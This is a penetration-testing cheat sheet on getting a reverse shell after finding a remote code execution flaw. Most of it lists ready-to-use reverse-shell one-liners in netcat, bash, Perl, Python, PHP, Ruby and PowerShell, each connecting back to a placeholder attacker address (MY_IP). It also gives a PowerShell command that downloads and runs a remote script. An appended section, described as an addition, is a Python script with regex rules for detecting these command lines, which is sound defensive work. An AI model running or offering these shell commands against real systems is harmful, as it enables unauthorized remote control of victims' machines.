If during a penetration test you discover an RCE (Remote Code Execution) vulnerability, most likely what you need is a reverse shell, to gain more control over the victim machine.
An RCE is a vulnerability that allows you to execute commands on the victim. This is why, if I start a listener on my system, I can execute a command on the exploited machine whose purpose is to make it connect back to my listener, giving me a shell.
First, you need to start a listener on your machine, typically using netcat:
Netcat listener:
nc -lnvp 1234
-l means "listen mode"
-n prevents "DNS lookup"
-v means "verbose mode"
-p means "the listened port" (in this case port 1234)
Then, once your listener is running, you can use the RCE on the victim machine to make it connect back to the listener.
There are various methods for doing this. The most commonly used are those for Linux systems, which are the following:
netcat
nc -e /bin/sh MY_IP 1234
or
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc MY_IP 1234 >/tmp/f
or
rm /tmp/f;mknod /tmp/f p;cat /tmp/f|/bin/sh -i 2>&1|nc MY_IP 1234 >/tmp/f
bash
bash -i >& /dev/tcp/MY_IP/1234 0>&1
or
0<&196;exec 196<>/dev/tcp/MY_IP/1234; sh <&196 >&196 2>&196
Perl
perl -e 'use Socket;$i="MY_IP";$p=1234;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'
python
IPv4
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("MY_IP",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn("/bin/bash")'
or
IPv6
python -c 'import socket,subprocess,os,pty;s=socket.socket(socket.AF_INET6,socket.SOCK_STREAM);s.connect(("dead:beef:2::125c",1234,0,2));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=pty.spawn("/bin/sh");'
PHP
php -r '$sock=fsockopen("MY_IP",1234);exec("/bin/sh -i <&3 >&3 2>&3");'
or
php -r '$sock=fsockopen("MY_IP",1234);shell_exec("/bin/sh -i <&3 >&3 2>&3");'
or
php -r '$sock=fsockopen("MY_IP",1234);`/bin/sh -i <&3 >&3 2>&3`;'
or
php -r '$sock=fsockopen("MY_IP",1234);system("/bin/sh -i <&3 >&3 2>&3");'
or
php -r '$sock=fsockopen("MY_IP",1234);passthru("/bin/sh -i <&3 >&3 2>&3");'
or
php -r '$sock=fsockopen("MY_IP",1234);popen("/bin/sh -i <&3 >&3 2>&3", "r");'
Ruby
ruby -rsocket -e'f=TCPSocket.open("MY_IP",1234).to_i;exec sprintf("/bin/sh -i <&%d >&%d 2>&%d",f,f,f)'
Windows victim machine
If the victim is a Windows machine you can use PowerShell (if it is installed) to connect to the listener:
powershell -nop -c "$client = New-Object System.Net.Sockets.TCPClient('MY_IP',1234);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()"
Alternatively, if you have a “ps1” reverse shell script on your machine, you can serve it with a simple web server on port 8000 using, for example, python3:
python3 -m http.server 8000
Then, to connect to the netcat listener, run PowerShell on the victim to download and execute the “ps1” script, as follows:
powershell "IEX(New-Object Net.WebClient).downloadString('http://MY_IP:8000/script.ps1')"
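From the defender's side, every one-liner above leaves a distinctive process command line (auditd execve records, EDR telemetry, shell history). The script below is an added example, not part of the original page: it encodes the patterns listed here as regular expressions and runs them over a few constructed (user, command line) records; the rule names, the record format and the sample lines are assumptions made for the example.

```python
import re

# Detection rules for the reverse-shell one-liners listed on this page.
# Each rule: (name, compiled regex applied to a process command line).
RULES = [
    ("netcat -e shell",       re.compile(r"\b(?:nc|ncat|netcat)\b[^|;]*\s-e\s+\S*sh\b")),
    ("bash /dev/tcp",         re.compile(r"/dev/tcp/[^/\s]+/\d+")),
    ("fifo piped to netcat",  re.compile(r"\bmk(?:fifo|nod)\b.*\|\s*(?:nc|ncat|netcat)\b")),
    ("python socket dup2",    re.compile(r"socket\.socket\(.*os\.dup2\(")),
    ("perl Socket exec",      re.compile(r"use Socket;.*\bexec\(")),
    ("php fsockopen shell",   re.compile(r"fsockopen\(.*<&3\s*>&3")),
    ("ruby TCPSocket exec",   re.compile(r"TCPSocket\.open\(.*\bexec\b")),
    ("powershell TCPClient",  re.compile(r"Net\.Sockets\.TCPClient\(.*GetStream\(\)", re.I)),
    ("powershell IEX cradle", re.compile(r"IEX\s*\(?\s*New-Object\s+Net\.WebClient\)\.downloadString\(", re.I)),
]


def detect(cmdline):
    """Return the names of every rule that matches one command line."""
    return [name for name, rx in RULES if rx.search(cmdline)]


def scan(records):
    """records: iterable of (user, cmdline). Returns (user, cmdline, hits) for matches."""
    alerts = []
    for user, cmd in records:
        hits = detect(cmd)
        if hits:
            alerts.append((user, cmd, hits))
    return alerts


# Constructed sample telemetry (documentation address range, not real data).
SAMPLE_RECORDS = [
    ("www-data", "nc -e /bin/sh 203.0.113.7 1234"),
    ("www-data", "bash -i >& /dev/tcp/203.0.113.7/1234 0>&1"),
    ("www-data", "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 203.0.113.7 1234 >/tmp/f"),
    ("www-data", "php -r '$sock=fsockopen(\"203.0.113.7\",1234);exec(\"/bin/sh -i <&3 >&3 2>&3\");'"),
    ("backup", "python3 -m http.server 8000"),
    ("alice", "ls -la /var/www"),
    ("IIS APPPOOL", "powershell \"IEX(New-Object Net.WebClient).downloadString('http://203.0.113.7:8000/script.ps1')\""),
]

if __name__ == "__main__":
    for user, cmd, hits in scan(SAMPLE_RECORDS):
        print(f"ALERT user={user!r} rules={hits} cmd={cmd[:60]!r}")
```

The web-server and `ls` lines are left alone; in production these rules belong on process-creation telemetry, where a match from a web-server account such as www-data is the strongest signal of an exploited RCE.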